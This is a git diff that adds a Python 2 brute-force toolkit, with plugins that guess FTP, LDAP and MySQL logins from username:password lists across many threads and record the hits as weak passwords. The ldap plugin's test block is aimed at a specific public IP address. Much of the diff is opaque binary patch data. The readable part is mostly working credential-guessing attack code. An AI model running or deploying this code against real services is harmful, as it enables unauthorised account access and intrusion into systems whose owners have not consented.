zcmcgvU2hvj6urAnoY=7whme*ww4gpzR#j{Y(mtT5AcFb;C=VMbA`)6$&-x=;uU*fW z)>3#Xe}+H9pMiHc=dQhR9`b@6dp&p0jCbcA-?=k$rto*Q{MVoVyll(tQ^5Tz6npH6 z7?E>WPmC{#C+7ee_T}7{*q4ifTx^Ib$U9Fw{ru;BN#T;$rXgf!x9F=pllcP$G zsyW)t(O!;fIob!>ls`cEJuyWE2V%Aqyf0>3!J(Lvf;(c$3hs*8QSgD7ih_G$stWFl z*;Q~PW>3L~VrmK=h}l>0Pz>Cm{{vRviTr&25yN#>KSUH=5#~)lvBR|gFFvQ1@ohAk zbwpPj&675*KPxA=+Zv1$xkP`S{O-x6hwk{)Y4+MSV8@N3SCjFm&NsEAwpv$5UDVhw zfto+scx;;)ho&126Wi>>X}33NrCr-@rD;5lnw?hL4aZa493_)(KYfu^8>6Y)LLcx& zS9bvI28?(W@Bgv3gI8CqL&hRxhqu5Pp2+z=dS8Nb8Ltnf_I0ub)}^^G@_x7i-gb?= z>5IG{EytTNNK9)XwQns+IEm&Wh%D{tifWI684@NsPVc1;U2g|YMWU;olhFEjIfhThQVila%v2tge zb^Uw3Jm=rmlGEf2PmJ@|%X5AcuVdvSXLus#7mJ)-6}4;1rHuytP&MiQqY#Lp4WUs* zg_}<;3(0m~knl`ZRGU(Yg}OwA7=D(n3b632ht2stt#m$s0*Q^@fM_h|TXctArr9Nwk5M{`8;00w`1-t|e# z#a+lyZR*A@%Epu)GnvajXXB)!qF}|MkxN_@_0ztKqVMSE5sY{xTm^6IhO6qU4(7nH zoS;~mx5qkyBH#S-Ocgwa6JM3`(DWQ#U&XzzSWi)x+Ty(~%TGGync&y(aGU6ogH5{VR$k1MzD9kyoc*^%+HU zA4QroQ8XBuNrGzl3=im=R|BVL6~~m2dih%v)%r!RbeK8$7)>)Ct%>Um$DqX-KD1f7 zPp!sl)N;M>b3V)T&9crmaO}BO=ajozX>3Ce2G?733NAiFg=rk8!o1h{oa7;I-llUi zemlC>*;uD3wdMRVovw=vu~A;@+uFp%n4XKza4Ij>F{PKDvl{MO7)H&X<1AyIbDZok UOcBS;ieK}~-VK*u+PLZZ58fD=^#A|> literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/.DS_Store b/Bruteforce/plugins/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..bac480a0c80a770d90e685e36bb2673fba863d1a GIT binary patch literal 6148 zcmeHKJ5Iw;5Zr|nk!Vsbwx{rVMMQVUb}On>SVBD27(#xwn zPWd1A<6PI*b$fhkM7~b9pMKz(*Y)jU?(jT%CcRmH5@x6X6`%rCfC~H%1<naC zsQ?wA0%ry6`%vJ9RpJonpAIZO0s!qd-VN72O8|=nfK}oUhzLxB3Jj{|h@nA8ykuRK zI0Ob=G=~q(J8MoT>UYQa#mhyjK(17P3QQHajP1ty{~df`{-2V#qXJamPbr|QdSCDG zO4(ayFK4~Bz#rg0hFUMj;;k6ytr#0?#n+>{V%Nx5i9?{%5qCO}KLVx;jSBpR0^iII BCSw2q literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/__init__.py b/Bruteforce/plugins/__init__.py new file mode 100644 index 0000000..7c9c8f4 --- /dev/null +++ b/Bruteforce/plugins/__init__.py @@ -0,0 +1 @@ +__author__ = 'wilson' diff --git a/Bruteforce/plugins/__init__.pyc b/Bruteforce/plugins/__init__.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5cb4cabc7a0877bf8772eca24f945b01b31bf064 GIT binary patch literal 171 zcmZSn%*$od8XTI;00oRd+5w1*xqw6p149&$WMl}|U;=VW*nmWNW=?T_o}UItVF^f4 ze0*YQNk)EAe7pvb$ABP;O@Lhe(BjmhVtt4%{gV9roMQd7)V%bJ(!{*<;^f4CUpP+ literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/ftp.py b/Bruteforce/plugins/ftp.py new file mode 100644 index 0000000..fff0050 --- /dev/null +++ b/Bruteforce/plugins/ftp.py @@ -0,0 +1,76 @@ +#coding=utf-8 +import time +import threading +from multiprocessing.dummy import Pool +from printers import printPink,printGreen +from ftplib import FTP + + +class ftp_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/ftp.conf") + + + def ftp_connect(self,ip,username,password,port): + crack=0 + try: + ftp=FTP() + ftp.connect(ip,str(port)) + ftp.login(user=username,passwd=password) + crack=1 + ftp.close() + except Exception,e: + self.lock.acquire() + print "%s ftp service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + return crack + + + def ftp_l(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + if self.ftp_connect(ip,username,password,port)==1: + self.lock.acquire() + printGreen("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ftp']): + printPink("crack ftp now...") + print "[*] start crack ftp %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['ftp']: + pool.apply_async(func=self.ftp_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop ftp serice %s" % time.ctime() + print "[*] crack ftp done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ftp': ['192.168.1.1:21']} + pinglist=['192.168.1.1'] + test=ftp_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + diff --git a/Bruteforce/plugins/ftp.pyc b/Bruteforce/plugins/ftp.pyc new file mode 100644 index 0000000000000000000000000000000000000000..cc1ec695216ef5db10042636b89d718338176220 GIT binary patch literal 3147 zcmb_eO>-N^5$(l-APE8d5M^3YWErxp1f@~{Q&A}r%ay1sIdZC0w7il-2PxLp3Oj%n zT;MVA=jMjyYpTzDCv;OArXKb^nCU7biaPR{`c*s z{qBd~4Q2jm;Qu}z`%g46ex9TvgIBUA15d|mlGbGE%fJ_p>wHP;GF_0tf=nASXjG$h zNf%|hB!eaN7sM>f2-_R-Cy`T;-w&E%&Plu|`!y;5aduuy1}!lynY3lHBJq-(dX=_i zNmu2WS>xWpx+GB5lrh?Ka%XT};ubrD4KYx=&Rv5GVlK$!9Wm#{Y)IUe7z$VA)c3qh zFZZ;&hKnXY;Ge_!zjy48TN~GHcm3kz}DhOy&Q%~mbfrH2PKwn7jM~H z#WUpb9N@qD>(3D2g_8w2`mHzx-AO}^8!~}kJaIKSuG2@SHSsvA!8k^2d^z^v+L{;F zxtnuXh?91+UrQbL+;2+xjd&-E*a&B1eo^Ovas~*BeHr<(`RMccG+>PFnI~T#FCY|j z;ZB04Lfj0#P`4J5wFfbvjk|q_=DO|R>K#n~F&Uc9&ur(q-Ns;=!!4arl%$<5K^pi} z#Xus4nHf6A0qe>tCS0x3FwL#esC{-gG=)p@ETGGDYcza0OG=}1X;Kqe)8%B);tC=$ zDKrE$H;bl5J8E)X#)^+3FDn=f%LquJ5wKqYV7lo1zW`v+p)j1^@;tisBK3L=&j$uJ z@oji3z(d8kVrmpG9U6W zgxDh1h%F+FX>^f)nztmdw$5Ttg%r3O;F*I#SC8tlNiKT@nEx^lH5Fo>yle}8ySv#2 zfVZr``x}4a)3?eMPxe%CfYYy=PYK|uKm3FD5~1c zE-5aclNBwtND~*l&oRZpCMDt^Am$XXQBjyI4&LS9J7|SXyruh+8- z{2y-Yb*zg@*Lh?9y4A3cX4z1Ms2tm%gVk?9^!4VvP_5t<(j3rgZ_E|HRvG7+xtTb{ z@n>mNSQB?#GBxBwWg?J*GntzojH;y7T}dc4SwK=%Q@E*OLrMXL#S!zsa(Wa-_9z<$ zAE6(RUIGG3b$~*H3+xcilN?>L_+g29Wi%lIf>GZR4$8!tkcF{gXC+XsPKr1IIWwCI z6j!a9T7I?M+JGsc^sN3=LwQ<(@~HWwS)RO!=3v#gIl%ZwBxO%rL-s<5`Msu!8LsO{m*`iSBC?Rr;Sxe!%N9W3|*bYRiku ztII2MYo<|>g`wqDdcA)2LdGcHu&Zddw(j<}?%nSF;#O~K`_@*4V#ayv9!Bn9vbUAo zLSMaZc?oE#UTpf#Sl3m)BM<||&XM1yc^Kny$C+wD2*NF)2Y6uC1b@`z?2NO*wFS0 o&@eW5n_gG{ep1EvS0sFU1x*V)x`qO~=5KCSauX$Y4NuGaH}1r2L;wH) literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/ldapd.py b/Bruteforce/plugins/ldapd.py new file mode 100644 index 0000000..45f2a69 --- /dev/null +++ b/Bruteforce/plugins/ldapd.py @@ -0,0 +1,86 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +import ldap + +class ldap_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/ldapd.conf") + + + def ldap_connect(self,ip,username,password,port): + creak=0 + try: + ldappath='ldap://'+ip+':'+port+'/' + l = ldap.initialize(ldappath) + re=l.simple_bind(username,password) + if re==1: + creak=1 + except Exception,e: + if e[0]['desc']=="Can't contact LDAP server": + creak=2 + pass + return creak + + def ldap_creak(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.ldap_connect(ip,username,password,port) + if flag==2: + self.lock.acquire() + printGreen("%s ldap at %s can't connect\r\n" %(ip,port)) + self.lock.release() + break + + if flag==1: + self.lock.acquire() + printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + else: + self.lock.acquire() + print "%s ldap service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + except Exception,e: + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ldap']): + printPink("crack ldap now...") + print "[*] start ldap %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['ldap']: + pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1])) + pool.close() + pool.join() + + print "[*] stop ldap serice %s" % time.ctime() + print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ldap': ['124.172.223.236:389']} + pinglist=['192.168.1.1'] + test=ldap_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + + diff --git a/Bruteforce/plugins/ldapd.pyc b/Bruteforce/plugins/ldapd.pyc new file mode 100644 index 0000000000000000000000000000000000000000..7a0ebdf3b3616e71dbd3cb83883065cb9f847774 GIT binary patch literal 3353 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 A^#A|> literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/mysql.py b/Bruteforce/plugins/mysql.py new file mode 100644 index 0000000..4388efa --- /dev/null +++ b/Bruteforce/plugins/mysql.py @@ -0,0 +1,80 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +import MySQLdb + + +class mysql_burp(object): + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/mysql.conf") + + def mysql_connect(self,ip,username,password,port): + crack =0 + try: + db=MySQLdb.connect(ip,username,password,port=port) + if db: + crack=1 + db.close() + except Exception, e: + if e[0]==1045: + self.lock.acquire() + print "%s mysql's %s:%s login fail" %(ip,username,password) + self.lock.release() + else: + self.lock.acquire() + print "connect %s mysql service at %s login fail " %(ip,port) + self.lock.release() + crack=2 + return crack + + def mysq1(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.mysql_connect(ip,username,password,port) + if flag==2: + break + + if flag==1: + self.lock.acquire() + printGreen("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['mysql']): + printPink("crack mysql now...") + print "[*] start crack mysql %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + for ip in ipdict['mysql']: + pool.apply_async(func=self.mysq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop crack mysql %s" % time.ctime() + print "[*] crack mysql done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'mysql': ['127.0.0.1:3306']} + pinglist=['127.0.0.1'] + test=mysql_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") \ No newline at end of file diff --git a/Bruteforce/plugins/mysql.pyc b/Bruteforce/plugins/mysql.pyc new file mode 100644 index 0000000000000000000000000000000000000000..d557ab399f49838fdab1e8d07409158676165509 GIT binary patch literal 3269 zcmb`J&u<&Y702I@6eUumBuj~EJ83{Sa7q}dcStX_ z++FPqD-ndoaxU_lK}&2~;-(zdr2PBETB|Zx6}u{vj!e1|FUz^9W?GSS zO+K;f96Q*M1XHzSjIu2c2iGKCWo57_7SnEU)L={OmP}p~drj=7#2tw-;hLP+jmdOl z&-&}wWb!|J_WCu5zJ;PFlgvL&vP0j#sC`sgoAnJf8YrITd8(b$xjRaS&u3+E=|3uc zfS-F8g@vi=Eo^yEqc17cC9bK^pugC%B*C*jXO3va#qSrK<`IfhBc~!mtZrmdqXSs2 z%eWF6tWNM<;tJR~dz*CVGu_pm<2Iu_8||vWI~4oNX!DFVYspx*?q8HPjFW7v+kBEo zhbp8Ls9IV#OTDU&lGNT$6X*RBI?^Pwu5ux_;cPmBt(d!yLbPxXA?<$ZZ0UB7lhoze zu7@Ap?#O227qc)MyC}>uTMl=NbT&>hx3IRD`xOiw4wEeL!y$v>*dV55*71vI02^qb z`s}X|;EA&(ng2vQ90Ql&Ta#0D{b_>?oHgaNDdhvk0Gc2I)ylhOKl{Bjd|eLPQhp)k zY+1}H7&dYvZYZvQRF^mCazw)b>dOU2b=m&tmy8Iyo7#Q!<=51)H0)`}sP+wA5Kn82 ze15uw_;Fu*35trmA}>A22ehxl&+ZLKw_Q)8`a{>d?H-|)=5Stb6vD@M(2wwDHuC7K z^m>TE?~=&<$U!?j;1T;(~DeYX0owC-HMnc`=E`I!beAm4OdWB3t+*&jN*sMHn5; zlG5s+(xx_aR`(FBqSJGMq|k8AU`7^BtyYTAx#PTygEeX~o>3WsIqJg#ZrJuwe0P$% zn4~(ji!E)S!SzsxX_~ru17*vs0jv$vHJfIm)`i?PZ4=d@!*Fn$irK#)%>O1QUoFnx z{?b{68w>385wt9;`i$ z!XrhoB9Osx_fcGuRT1?fbiHF69@?yT5!YL{epG#w&~CfWLmaTsV7nqsd_b5Lq+p8@ zgC5Y|nt8&auvr|u#>Pz)S5O77vrWNa>WM=i2HR}<9turgqcj``H&J^v2oX;rbnk5l z?kyAoa5l^q{;r#jY1BFZ=BDYP>;N9kPrO+8Q*hqG-jJ3Me5MqHth{O9UckceA>06e zQfGLONhoX12Q=6YP=XRbIXSqP;PJu7f)vH{1ty@P@kj7+3X!&;j#%TKg@EjG13~_l zjukZo3F%yF=IDv+bGo)7LTObc+_*2BhO76|I`DTL)}FjCzN4Fi5nV2c@8g4a@roSJ>7K%&r`0j$niCdDEX$8~c6Qu#H2?O_LC^WH z^u3oAZo4Y>vn)~}EXOW*6Y5t4I}%cj&Wo=N*6W*nFV7k0nSD3$Jre$58WzsRJ)cZ1 zv##bb

i+zgQYKWS{8;7YS}in+5n+5y?SSnxho(BzY!CP@c|*p_^w>aEpx`>3kV{ z|DuAYNpOu7vOdXC<>5RjaeZ1nEde|9adKQH-VS+B_eoxrfvKGoaT56|@#3!6OI#DU z-u^Clhcj@9dR1-Zqy=tkJ#3l@l2>z>xWRIk{g|uqhzbr;8;7QYLv+pjy4E)B+Pc}Q zy=nS1U5y?Nd2tMfy365kn#Z#g)qu=YS%kg|_};iOQl;N7gw6b|;=qr*ow%;0sVu$)8W~8qnPY z@3B!4n^(vdp??uDqbZG1KAq}YF&QgWK?gm-T^9GKqol#YSL|us;ZLim{!A|!9@`Fb T={Df#)VF_5nV7Utwjlo>eaVe{ literal 0 HcmV?d00001 diff --git a/Bruteforce/plugins/ndr.pyc b/Bruteforce/plugins/ndr.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5d3e32c0ef39586f46be63b67bc490d58b5bccdc GIT binary patch literal 51798 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 